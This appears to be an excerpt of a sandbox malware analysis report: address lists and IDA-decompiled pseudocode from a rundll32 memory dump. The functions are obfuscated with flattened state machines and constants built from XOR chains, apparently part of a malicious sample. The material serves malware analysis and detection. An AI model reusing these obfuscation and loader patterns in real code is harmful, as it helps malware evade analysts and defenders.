                                                                                                                                                            0x003823c3
                                                                                                                                                            0x003823c5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003823cb
                                                                                                                                                            0x00382519
                                                                                                                                                            0x00382532
                                                                                                                                                            0x00382537
                                                                                                                                                            0x00382540
                                                                                                                                                            0x003823d1
                                                                                                                                                            0x003823d7
                                                                                                                                                            0x0038243c
                                                                                                                                                            0x0038243d
                                                                                                                                                            0x00382445
                                                                                                                                                            0x0038244a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003823d9
                                                                                                                                                            0x003823df
                                                                                                                                                            0x00382420
                                                                                                                                                            0x00382425
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003823e1
                                                                                                                                                            0x003823e7
                                                                                                                                                            0x00382416
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003823e9
                                                                                                                                                            0x003823ef
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003823f5
                                                                                                                                                            0x00382406
                                                                                                                                                            0x0038240b
                                                                                                                                                            0x0038240e
                                                                                                                                                            0x0038240e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038240e
                                                                                                                                                            0x003823ef
                                                                                                                                                            0x003823e7
                                                                                                                                                            0x003823df
                                                                                                                                                            0x003823d7
                                                                                                                                                            0x00382544
                                                                                                                                                            0x0038254f
                                                                                                                                                            0x0038254f
                                                                                                                                                            0x00382454
                                                                                                                                                            0x0038245a
                                                                                                                                                            0x003824ca
                                                                                                                                                            0x003824cf
                                                                                                                                                            0x003824d1
                                                                                                                                                            0x003824d4
                                                                                                                                                            0x003824d6
                                                                                                                                                            0x003824f0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003824d8
                                                                                                                                                            0x003824d8
                                                                                                                                                            0x003824e0
                                                                                                                                                            0x003824e6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003824e6
                                                                                                                                                            0x0038245c
                                                                                                                                                            0x0038245c
                                                                                                                                                            0x0038245e
                                                                                                                                                            0x00382478
                                                                                                                                                            0x0038247c
                                                                                                                                                            0x00382480
                                                                                                                                                            0x00382484
                                                                                                                                                            0x00382499
                                                                                                                                                            0x0038249a
                                                                                                                                                            0x0038249f
                                                                                                                                                            0x003824a2
                                                                                                                                                            0x003824a7
                                                                                                                                                            0x003824ab
                                                                                                                                                            0x003824ac
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00382460
                                                                                                                                                            0x00382460
                                                                                                                                                            0x00382466
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038246c
                                                                                                                                                            0x0038246c
                                                                                                                                                            0x00382471
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00382471
                                                                                                                                                            0x00382466
                                                                                                                                                            0x0038245e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003824f5
                                                                                                                                                            0x003824f5
                                                                                                                                                            0x003824f5
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: /"$>6:$Z*>$u=@
                                                                                                                                                            • API String ID: 0-89199335
                                                                                                                                                            • Opcode ID: ed08642f4bb213059c3c234f66e63ea6551c3a9d2ae31ea333db936d1f5841bd
                                                                                                                                                            • Instruction ID: 404113286a395cca7a1a11d421a3d1f1f14bf0ea52a699ebc4e3ae9fab03f1c2
                                                                                                                                                            • Opcode Fuzzy Hash: ed08642f4bb213059c3c234f66e63ea6551c3a9d2ae31ea333db936d1f5841bd
                                                                                                                                                            • Instruction Fuzzy Hash: EFB101711083809FC369DF66C48A81BFBE1FBD4748F20991DF6A686261D3B58949CF92
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E00375548(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                            				char _v16;
                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                            				char _v28;
                                                                                                                                                            				char _v40;
                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                            				char _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				char _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				signed int _v92;
                                                                                                                                                            				signed int _v96;
                                                                                                                                                            				signed int _v100;
                                                                                                                                                            				signed int _v104;
                                                                                                                                                            				signed int _v108;
                                                                                                                                                            				signed int _v112;
                                                                                                                                                            				unsigned int _v116;
                                                                                                                                                            				signed int _v120;
                                                                                                                                                            				signed int _v124;
                                                                                                                                                            				signed int _v128;
                                                                                                                                                            				signed int _v132;
                                                                                                                                                            				signed int _v136;
                                                                                                                                                            				signed int _v140;
                                                                                                                                                            				signed int _v144;
                                                                                                                                                            				signed int _v148;
                                                                                                                                                            				void* __ecx;
                                                                                                                                                            				void* _t190;
                                                                                                                                                            				void* _t206;
                                                                                                                                                            				void* _t208;
                                                                                                                                                            				signed int _t209;
                                                                                                                                                            				char* _t211;
                                                                                                                                                            				signed int _t212;
                                                                                                                                                            				intOrPtr _t222;
                                                                                                                                                            				intOrPtr* _t225;
                                                                                                                                                            				void* _t227;
                                                                                                                                                            				char* _t229;
                                                                                                                                                            				char _t233;
                                                                                                                                                            				intOrPtr _t255;
                                                                                                                                                            				intOrPtr* _t257;
                                                                                                                                                            				signed int _t258;
                                                                                                                                                            				signed int _t259;
                                                                                                                                                            				signed int _t260;
                                                                                                                                                            				signed int* _t263;
                                                                                                                                                            
                                                                                                                                                            				_t225 = _a16;
                                                                                                                                                            				_t257 = _a4;
                                                                                                                                                            				_push(_t225);
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_t257);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				E003820B9(_t190);
                                                                                                                                                            				_v56 = 0xb9e7cb;
                                                                                                                                                            				_t255 = 0;
                                                                                                                                                            				_v52 = 0x6e87b5;
                                                                                                                                                            				_t263 =  &(( &_v148)[6]);
                                                                                                                                                            				_v48 = 0;
                                                                                                                                                            				_v44 = 0;
                                                                                                                                                            				_t227 = 0x3ccc1e9;
                                                                                                                                                            				_v128 = 0x85629b;
                                                                                                                                                            				_t258 = 0x62;
                                                                                                                                                            				_v128 = _v128 * 0x5a;
                                                                                                                                                            				_v128 = _v128 + 0xfbaf;
                                                                                                                                                            				_v128 = _v128 ^ 0x2ee5a62d;
                                                                                                                                                            				_v144 = 0xfc0c7f;
                                                                                                                                                            				_v144 = _v144 ^ 0xfdfaf442;
                                                                                                                                                            				_v144 = _v144 >> 1;
                                                                                                                                                            				_v144 = _v144 | 0x14143ad1;
                                                                                                                                                            				_v144 = _v144 ^ 0x7e977ecf;
                                                                                                                                                            				_v96 = 0xd1f565;
                                                                                                                                                            				_v96 = _v96 * 0x21;
                                                                                                                                                            				_v96 = _v96 ^ 0x1b12de47;
                                                                                                                                                            				_v104 = 0xb219e8;
                                                                                                                                                            				_v104 = _v104 | 0x75a31cc8;
                                                                                                                                                            				_v104 = _v104 ^ 0x75be6df4;
                                                                                                                                                            				_v80 = 0x6fb9b6;
                                                                                                                                                            				_v80 = _v80 * 0x3e;
                                                                                                                                                            				_v80 = _v80 ^ 0x1b001c4a;
                                                                                                                                                            				_v132 = 0x1154a0;
                                                                                                                                                            				_v132 = _v132 << 0xb;
                                                                                                                                                            				_v132 = _v132 + 0xfffffde8;
                                                                                                                                                            				_v132 = _v132 | 0xd1d436bb;
                                                                                                                                                            				_v132 = _v132 ^ 0xdbfeae5a;
                                                                                                                                                            				_v76 = 0x5374cd;
                                                                                                                                                            				_v76 = _v76 << 2;
                                                                                                                                                            				_v76 = _v76 ^ 0x0147cb67;
                                                                                                                                                            				_v140 = 0x35e68a;
                                                                                                                                                            				_v140 = _v140 + 0xffff467d;
                                                                                                                                                            				_v140 = _v140 * 0x7c;
                                                                                                                                                            				_v140 = _v140 ^ 0x566bba39;
                                                                                                                                                            				_v140 = _v140 ^ 0x4faa8078;
                                                                                                                                                            				_v124 = 0xf91357;
                                                                                                                                                            				_v124 = _v124 << 0xf;
                                                                                                                                                            				_v124 = _v124 + 0xf2e4;
                                                                                                                                                            				_v124 = _v124 ^ 0x89afe8a4;
                                                                                                                                                            				_v112 = 0xf055e4;
                                                                                                                                                            				_v112 = _v112 ^ 0x101963ca;
                                                                                                                                                            				_v112 = _v112 | 0x7be8ad21;
                                                                                                                                                            				_v112 = _v112 ^ 0x7be17431;
                                                                                                                                                            				_v84 = 0x17393b;
                                                                                                                                                            				_v84 = _v84 << 6;
                                                                                                                                                            				_v84 = _v84 ^ 0x05c81c43;
                                                                                                                                                            				_v120 = 0xf688ab;
                                                                                                                                                            				_v120 = _v120 / _t258;
                                                                                                                                                            				_v120 = _v120 * 0x2d;
                                                                                                                                                            				_v120 = _v120 ^ 0x00718a36;
                                                                                                                                                            				_v116 = 0xa21f51;
                                                                                                                                                            				_v116 = _v116 + 0x3c3b;
                                                                                                                                                            				_v116 = _v116 >> 0xa;
                                                                                                                                                            				_v116 = _v116 ^ 0x0006c391;
                                                                                                                                                            				_v88 = 0x51e239;
                                                                                                                                                            				_v88 = _v88 + 0x2ec0;
                                                                                                                                                            				_v88 = _v88 ^ 0x0058dd2b;
                                                                                                                                                            				_v136 = 0xa92d92;
                                                                                                                                                            				_v136 = _v136 >> 0xd;
                                                                                                                                                            				_v136 = _v136 ^ 0x0647b396;
                                                                                                                                                            				_v136 = _v136 ^ 0x20b7ff2f;
                                                                                                                                                            				_v136 = _v136 ^ 0x26fd7475;
                                                                                                                                                            				_v108 = 0xb50576;
                                                                                                                                                            				_t259 = 0x45;
                                                                                                                                                            				_v108 = _v108 / _t259;
                                                                                                                                                            				_v108 = _v108 ^ 0xb94dc178;
                                                                                                                                                            				_v108 = _v108 ^ 0xb943792d;
                                                                                                                                                            				_v148 = 0xb9b260;
                                                                                                                                                            				_t260 = 0x14;
                                                                                                                                                            				_v148 = _v148 / _t260;
                                                                                                                                                            				_v148 = _v148 * 0x3f;
                                                                                                                                                            				_v148 = _v148 >> 2;
                                                                                                                                                            				_v148 = _v148 ^ 0x009e914b;
                                                                                                                                                            				_v92 = 0x6e7d65;
                                                                                                                                                            				_v92 = _v92 | 0xb573042f;
                                                                                                                                                            				_v92 = _v92 ^ 0xb570b7bc;
                                                                                                                                                            				_v100 = 0xfd8f7e;
                                                                                                                                                            				_v100 = _v100 * 0x5d;
                                                                                                                                                            				_v100 = _v100 ^ 0x5c1db3f3;
                                                                                                                                                            				L1:
                                                                                                                                                            				while(_t227 != 0x3c16ad4) {
                                                                                                                                                            					if(_t227 == 0x3ccc1e9) {
                                                                                                                                                            						_t227 = 0x7dbf5b4;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t227 == 0x79abc1a) {
                                                                                                                                                            						_t229 =  &_v28;
                                                                                                                                                            						_t208 = E0037AEFB(_t229, _v124, _v112, _v84,  &_v16, _v120);
                                                                                                                                                            						_t263 =  &(_t263[4]);
                                                                                                                                                            						if(_t208 != 0) {
                                                                                                                                                            							_push(_t229);
                                                                                                                                                            							_push(_t229);
                                                                                                                                                            							_t222 = E00377FF2(_v24);
                                                                                                                                                            							 *_t257 = _t222;
                                                                                                                                                            							if(_t222 != 0) {
                                                                                                                                                            								E0037ED7E(_v108,  *_t257, _v148, _v28, _v24);
                                                                                                                                                            								_t263 =  &(_t263[3]);
                                                                                                                                                            								 *((intOrPtr*)(_t257 + 4)) = _v24;
                                                                                                                                                            								_t255 = 1;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						_t227 = 0xdaef9d5;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t227 == 0x7dbf5b4) {
                                                                                                                                                            						_t209 =  *((intOrPtr*)(_t225 + 4));
                                                                                                                                                            						_t233 =  *_t225;
                                                                                                                                                            						_v68 = _t209;
                                                                                                                                                            						_v72 = _t233;
                                                                                                                                                            						_t211 = _t209 - 1 + _t233;
                                                                                                                                                            						while(_t211 > _t233) {
                                                                                                                                                            							if( *_t211 == 0) {
                                                                                                                                                            								break;
                                                                                                                                                            							}
                                                                                                                                                            							_t211 = _t211 - 1;
                                                                                                                                                            						}
                                                                                                                                                            						_t212 = _t211 - _t233;
                                                                                                                                                            						_v68 = _t212;
                                                                                                                                                            						if(_t212 == 0) {
                                                                                                                                                            							L16:
                                                                                                                                                            							_t227 = 0xfc35b14;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						while(_v68 % _v144 != _v128) {
                                                                                                                                                            							_t163 =  &_v68;
                                                                                                                                                            							 *_t163 = _v68 - 1;
                                                                                                                                                            							if( *_t163 != 0) {
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            							goto L16;
                                                                                                                                                            						}
                                                                                                                                                            						goto L16;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t227 == 0xdaef9d5) {
                                                                                                                                                            						E00388519(_v92, _v100, _v64);
                                                                                                                                                            						L28:
                                                                                                                                                            						return _t255;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t227 != 0xfc35b14) {
                                                                                                                                                            						L25:
                                                                                                                                                            						if(_t227 != 0xb843ed5) {
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						goto L28;
                                                                                                                                                            					}
                                                                                                                                                            					if(E00375E60( &_v72, _v96, _v104,  &_v64) == 0) {
                                                                                                                                                            						goto L28;
                                                                                                                                                            					}
                                                                                                                                                            					_t227 = 0x3c16ad4;
                                                                                                                                                            				}
                                                                                                                                                            				_t206 = E00378B3D( &_v40, _v80, _v132,  &_v64, _v76, _v140);
                                                                                                                                                            				_t263 =  &(_t263[4]);
                                                                                                                                                            				if(_t206 == 0) {
                                                                                                                                                            					_t227 = 0xdaef9d5;
                                                                                                                                                            					goto L25;
                                                                                                                                                            				}
                                                                                                                                                            				_t227 = 0x79abc1a;
                                                                                                                                                            				goto L1;
                                                                                                                                                            			}

                                                                                                                                                            0x0037594d
                                                                                                                                                            0x00375959
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00375959
                                                                                                                                                            0x0037594f
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 1t{$9Q$;<$e}n
                                                                                                                                                            • API String ID: 0-2095593254
                                                                                                                                                            • Opcode ID: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                                                            • Instruction ID: 35bffac80f40563ef471ffde65251e8c3f69cb80f1ae6c56e40d5de78e031b96
                                                                                                                                                            • Opcode Fuzzy Hash: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                                                            • Instruction Fuzzy Hash: 98B140B1108381DFC329CF22C58591BBBE1FBD5748F50891DF69A9A260D7B58A4ACF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                            			E00387DD5() {
                                                                                                                                                            				char _v520;
                                                                                                                                                            				char _v1040;
                                                                                                                                                            				signed int _v1044;
                                                                                                                                                            				signed int _v1048;
                                                                                                                                                            				intOrPtr _v1052;
                                                                                                                                                            				intOrPtr _v1056;
                                                                                                                                                            				unsigned int _v1060;
                                                                                                                                                            				signed int _v1064;
                                                                                                                                                            				signed int _v1068;
                                                                                                                                                            				signed int _v1072;
                                                                                                                                                            				signed int _v1076;
                                                                                                                                                            				signed int _v1080;
                                                                                                                                                            				signed int _v1084;
                                                                                                                                                            				signed int _v1088;
                                                                                                                                                            				signed int _v1092;
                                                                                                                                                            				signed int _v1096;
                                                                                                                                                            				signed int _v1100;
                                                                                                                                                            				signed int _v1104;
                                                                                                                                                            				signed int _v1108;
                                                                                                                                                            				signed int _v1112;
                                                                                                                                                            				signed int _v1116;
                                                                                                                                                            				signed int _v1120;
                                                                                                                                                            				signed int _v1124;
                                                                                                                                                            				signed int _v1128;
                                                                                                                                                            				signed int _v1132;
                                                                                                                                                            				signed int _v1136;
                                                                                                                                                            				signed int _v1140;
                                                                                                                                                            				signed int _v1144;
                                                                                                                                                            				signed int _v1148;
                                                                                                                                                            				signed int _v1152;
                                                                                                                                                            				signed int _v1156;
                                                                                                                                                            				intOrPtr _t236;
                                                                                                                                                            				void* _t241;
                                                                                                                                                            				short* _t244;
                                                                                                                                                            				void* _t247;
                                                                                                                                                            				void* _t250;
                                                                                                                                                            				intOrPtr _t256;
                                                                                                                                                            				intOrPtr _t272;
                                                                                                                                                            				signed int _t278;
                                                                                                                                                            				signed int _t279;
                                                                                                                                                            				signed int _t280;
                                                                                                                                                            				signed int* _t283;
                                                                                                                                                            
                                                                                                                                                            				_t283 =  &_v1156;
                                                                                                                                                            				_v1048 = _v1048 & 0x00000000;
                                                                                                                                                            				_v1044 = _v1044 & 0x00000000;
                                                                                                                                                            				_t250 = 0x1242b9;
                                                                                                                                                            				_v1056 = 0xc74a30;
                                                                                                                                                            				_v1052 = 0xdc93e6;
                                                                                                                                                            				_v1140 = 0x94ae82;
                                                                                                                                                            				_v1140 = _v1140 * 0x5d;
                                                                                                                                                            				_v1140 = _v1140 | 0xd08f5b59;
                                                                                                                                                            				_t278 = 0x3b;
                                                                                                                                                            				_v1140 = _v1140 / _t278;
                                                                                                                                                            				_v1140 = _v1140 ^ 0x042b78b4;
                                                                                                                                                            				_v1060 = 0xf2c7d8;
                                                                                                                                                            				_v1060 = _v1060 >> 0xe;
                                                                                                                                                            				_v1060 = _v1060 ^ 0x000b32e4;
                                                                                                                                                            				_v1084 = 0xadf7c1;
                                                                                                                                                            				_v1084 = _v1084 >> 7;
                                                                                                                                                            				_v1084 = _v1084 ^ 0x0005ae79;
                                                                                                                                                            				_v1068 = 0x4ca2f2;
                                                                                                                                                            				_v1068 = _v1068 | 0x7f3e9315;
                                                                                                                                                            				_v1068 = _v1068 ^ 0x7f77e091;
                                                                                                                                                            				_v1148 = 0xfaa01c;
                                                                                                                                                            				_v1148 = _v1148 | 0x0a84fcb5;
                                                                                                                                                            				_t279 = 0x3d;
                                                                                                                                                            				_v1148 = _v1148 / _t279;
                                                                                                                                                            				_v1148 = _v1148 + 0xffff92ee;
                                                                                                                                                            				_v1148 = _v1148 ^ 0x0020489e;
                                                                                                                                                            				_v1104 = 0xbd50a4;
                                                                                                                                                            				_v1104 = _v1104 | 0x802f8c80;
                                                                                                                                                            				_v1104 = _v1104 ^ 0xe2a4d8db;
                                                                                                                                                            				_v1104 = _v1104 ^ 0x621899e9;
                                                                                                                                                            				_v1096 = 0x4ec4a;
                                                                                                                                                            				_t280 = 0x27;
                                                                                                                                                            				_v1096 = _v1096 / _t280;
                                                                                                                                                            				_v1096 = _v1096 ^ 0x000ca7f0;
                                                                                                                                                            				_v1156 = 0x496e13;
                                                                                                                                                            				_v1156 = _v1156 << 0xb;
                                                                                                                                                            				_v1156 = _v1156 + 0xffff34c4;
                                                                                                                                                            				_v1156 = _v1156 ^ 0xea67072b;
                                                                                                                                                            				_v1156 = _v1156 ^ 0xa10c07e0;
                                                                                                                                                            				_v1132 = 0x5417d7;
                                                                                                                                                            				_v1132 = _v1132 ^ 0x2d0a29d3;
                                                                                                                                                            				_v1132 = _v1132 * 0x11;
                                                                                                                                                            				_v1132 = _v1132 ^ 0x95d68b4c;
                                                                                                                                                            				_v1132 = _v1132 ^ 0x969bce68;
                                                                                                                                                            				_v1108 = 0x3d434d;
                                                                                                                                                            				_t83 =  &_v1108; // 0x3d434d
                                                                                                                                                            				_v1108 =  *_t83 * 0x5d;
                                                                                                                                                            				_v1108 = _v1108 + 0xbd1d;
                                                                                                                                                            				_v1108 = _v1108 ^ 0x16426462;
                                                                                                                                                            				_v1064 = 0x905f90;
                                                                                                                                                            				_v1064 = _v1064 << 7;
                                                                                                                                                            				_v1064 = _v1064 ^ 0x482aff2b;
                                                                                                                                                            				_v1076 = 0xa70fe8;
                                                                                                                                                            				_v1076 = _v1076 ^ 0x0f6696b3;
                                                                                                                                                            				_v1076 = _v1076 ^ 0x0fce7292;
                                                                                                                                                            				_v1144 = 0x5add64;
                                                                                                                                                            				_v1144 = _v1144 * 0x72;
                                                                                                                                                            				_v1144 = _v1144 >> 2;
                                                                                                                                                            				_v1144 = _v1144 + 0xffffbbe0;
                                                                                                                                                            				_v1144 = _v1144 ^ 0x0a105df6;
                                                                                                                                                            				_v1112 = 0xa934e1;
                                                                                                                                                            				_v1112 = _v1112 + 0xffff3dc6;
                                                                                                                                                            				_v1112 = _v1112 ^ 0xf71e7087;
                                                                                                                                                            				_v1112 = _v1112 ^ 0xf7bbdd65;
                                                                                                                                                            				_v1152 = 0xfe7bab;
                                                                                                                                                            				_v1152 = _v1152 + 0xffffe121;
                                                                                                                                                            				_v1152 = _v1152 << 7;
                                                                                                                                                            				_v1152 = _v1152 + 0xffffae88;
                                                                                                                                                            				_v1152 = _v1152 ^ 0x7f211c18;
                                                                                                                                                            				_v1092 = 0x242707;
                                                                                                                                                            				_v1092 = _v1092 >> 6;
                                                                                                                                                            				_v1092 = _v1092 ^ 0x0003c6d8;
                                                                                                                                                            				_v1136 = 0xebac4f;
                                                                                                                                                            				_v1136 = _v1136 + 0x4c15;
                                                                                                                                                            				_v1136 = _v1136 >> 0xf;
                                                                                                                                                            				_v1136 = _v1136 ^ 0xdf38e0e8;
                                                                                                                                                            				_v1136 = _v1136 ^ 0xdf3b1dfc;
                                                                                                                                                            				_v1120 = 0x4eb7ab;
                                                                                                                                                            				_v1120 = _v1120 << 2;
                                                                                                                                                            				_v1120 = _v1120 + 0xffff85cc;
                                                                                                                                                            				_v1120 = _v1120 ^ 0x01347c50;
                                                                                                                                                            				_v1088 = 0xc2f923;
                                                                                                                                                            				_v1088 = _v1088 * 0xf;
                                                                                                                                                            				_v1088 = _v1088 ^ 0x0b6c1f22;
                                                                                                                                                            				_v1080 = 0xbf02c1;
                                                                                                                                                            				_v1080 = _v1080 + 0xffffcd4c;
                                                                                                                                                            				_v1080 = _v1080 ^ 0x00bd8b7d;
                                                                                                                                                            				_v1128 = 0xfef10;
                                                                                                                                                            				_v1128 = _v1128 + 0xfa25;
                                                                                                                                                            				_v1128 = _v1128 + 0xffffb342;
                                                                                                                                                            				_v1128 = _v1128 + 0x2fe7;
                                                                                                                                                            				_v1128 = _v1128 ^ 0x00107547;
                                                                                                                                                            				_v1116 = 0x30091d;
                                                                                                                                                            				_v1116 = _v1116 | 0x682f5e67;
                                                                                                                                                            				_v1116 = _v1116 * 0xf;
                                                                                                                                                            				_v1116 = _v1116 ^ 0x1bb1960a;
                                                                                                                                                            				_v1100 = 0xdd7fbe;
                                                                                                                                                            				_v1100 = _v1100 >> 0xf;
                                                                                                                                                            				_v1100 = _v1100 + 0xffff26d4;
                                                                                                                                                            				_v1100 = _v1100 ^ 0xfff0a895;
                                                                                                                                                            				_v1072 = 0xd8d782;
                                                                                                                                                            				_v1072 = _v1072 + 0xffff857d;
                                                                                                                                                            				_v1072 = _v1072 ^ 0x00daabd2;
                                                                                                                                                            				_v1124 = 0x615b7c;
                                                                                                                                                            				_v1124 = _v1124 >> 0x10;
                                                                                                                                                            				_v1124 = _v1124 * 0x3d;
                                                                                                                                                            				_v1124 = _v1124 ^ 0x000147a1;
                                                                                                                                                            				L1:
                                                                                                                                                            				while(_t250 != 0x1242b9) {
                                                                                                                                                            					if(_t250 == 0x56337fc) {
                                                                                                                                                            						E00386C49(_v1144, _v1112, _v1152, _v1092,  &_v520);
                                                                                                                                                            						_push(_v1088);
                                                                                                                                                            						_push( &_v520);
                                                                                                                                                            						_push(_v1120);
                                                                                                                                                            						E003913AD(_v1136,  &_v1040, __eflags);
                                                                                                                                                            						_t283 =  &(_t283[6]);
                                                                                                                                                            						_t250 = 0x8d6676f;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t250 == 0x5f94146) {
                                                                                                                                                            						_push(_v1148);
                                                                                                                                                            						_push(_v1068);
                                                                                                                                                            						_t241 = E0038DCF7(_v1084, 0x371000, __eflags);
                                                                                                                                                            						_t256 =  *0x393e10; // 0x0
                                                                                                                                                            						_t272 =  *0x393e10; // 0x0
                                                                                                                                                            						E003747CE(_t272 + 0x23c, _v1104, _t256 + 0x1c, _v1096, _v1156, _t241, _t256 + 0x1c, _v1132, _v1108);
                                                                                                                                                            						E0037A8B0(_v1064, _t241, _v1076);
                                                                                                                                                            						_t283 =  &(_t283[9]);
                                                                                                                                                            						_t250 = 0x56337fc;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t250 == 0x8d6676f) {
                                                                                                                                                            						_t244 = E0037B6CF( &_v1040, _v1080, _v1128, _v1116);
                                                                                                                                                            						__eflags = 0;
                                                                                                                                                            						 *_t244 = 0;
                                                                                                                                                            						return E0037B1C6( &_v1040, _v1100, _v1072, _v1124);
                                                                                                                                                            					}
                                                                                                                                                            					if(_t250 == 0xbcbde3e) {
                                                                                                                                                            						_t247 = E0038473C();
                                                                                                                                                            						L8:
                                                                                                                                                            						_t250 = 0x5f94146;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t250 != 0xf4317dc) {
                                                                                                                                                            						L15:
                                                                                                                                                            						__eflags = _t250 - 0xfb0317f;
                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						return _t247;
                                                                                                                                                            					}
                                                                                                                                                            					_t247 = E00373E3F();
                                                                                                                                                            					goto L8;
                                                                                                                                                            				}
                                                                                                                                                            				_t236 =  *0x393e10; // 0x0
                                                                                                                                                            				__eflags =  *((intOrPtr*)(_t236 + 0x450));
                                                                                                                                                            				if(__eflags == 0) {
                                                                                                                                                            					_t250 = 0xf4317dc;
                                                                                                                                                            					goto L15;
                                                                                                                                                            				}
                                                                                                                                                            				_t250 = 0xbcbde3e;
                                                                                                                                                            				goto L1;
                                                                                                                                                            			}













































                                                                                                                                                            0x003881c6
                                                                                                                                                            0x003881cb
                                                                                                                                                            0x003881ce
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003881ce
                                                                                                                                                            0x0038813a
                                                                                                                                                            0x0038825a
                                                                                                                                                            0x00388263
                                                                                                                                                            0x0038826d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038827c
                                                                                                                                                            0x00388142
                                                                                                                                                            0x0038815d
                                                                                                                                                            0x00388155
                                                                                                                                                            0x00388155
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00388155
                                                                                                                                                            0x00388146
                                                                                                                                                            0x00388239
                                                                                                                                                            0x00388239
                                                                                                                                                            0x0038823f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038823f
                                                                                                                                                            0x00388150
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00388150
                                                                                                                                                            0x00388222
                                                                                                                                                            0x00388227
                                                                                                                                                            0x0038822e
                                                                                                                                                            0x00388237
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00388237
                                                                                                                                                            0x00388230
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: MC=$g^/h$|[a$/
                                                                                                                                                            • API String ID: 0-1545830693
                                                                                                                                                            • Opcode ID: 1d3966bd5d5f96d3a6d87ec4215b7e6fed083ec5c9eec0ea98fa54c947001be6
                                                                                                                                                            • Instruction ID: c4b6ee3baa9cc41c08354ce30b415086dc95c23b9105b76ecc0bae6e4b49ac18
